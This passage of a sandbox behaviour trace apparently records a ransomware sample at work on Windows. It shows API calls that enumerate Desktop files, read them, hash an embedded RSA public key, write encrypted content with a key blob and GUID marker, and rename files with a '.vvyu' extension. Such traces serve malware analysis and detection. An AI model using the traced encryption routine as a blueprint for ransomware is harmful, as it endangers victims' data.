hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e954a0 | out: hHeap=0x620000) returned 1 [0192.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.799] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x10cc9, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x10cc9, lpOverlapped=0x0) returned 1 [0192.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.800] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x10cce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.800] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.801] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.802] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.802] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.802] CloseHandle (hObject=0x568) returned 1 [0192.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.804] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\OfbL.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ofbl.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\OfbL.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ofbl.flv.vvyu")) returned 1 [0192.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.805] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.808] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf053c2f0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xbe4debb0, ftLastAccessTime.dwHighDateTime=0x1d8a6c7, ftLastWriteTime.dwLowDateTime=0xbe4debb0, ftLastWriteTime.dwHighDateTime=0x1d8a6c7, nFileSizeHigh=0x0, nFileSizeLow=0x4453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQ3XsPcRg.swf", cAlternateFileName="QQ3XSP~1.SWF")) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954a0 [0192.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e954a0 | out: hHeap=0x620000) returned 1 [0192.809] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\QQ3XsPcRg.swf") returned=".swf" [0192.809] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\QQ3XsPcRg.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\qq3xspcrg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.809] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=17491) returned 1 [0192.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.813] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x442d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.813] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.816] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.816] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4453, lpOverlapped=0x0) returned 1 [0192.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.817] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.818] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.818] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.818] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.818] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.818] GetLastError () returned 0x0 [0192.818] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.818] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.819] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.819] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.819] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4450) returned 0x2e9ea68 [0192.819] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954a0 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954e8 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.820] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2ec0 [0192.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ec0 | out: hHeap=0x620000) returned 1 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c936c0 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0192.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.823] GetCurrentThreadId () returned 0x66c [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e920 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.824] GetCurrentThreadId () returned 0x66c [0192.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2ec0 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea30d0 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea32e8 [0192.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) 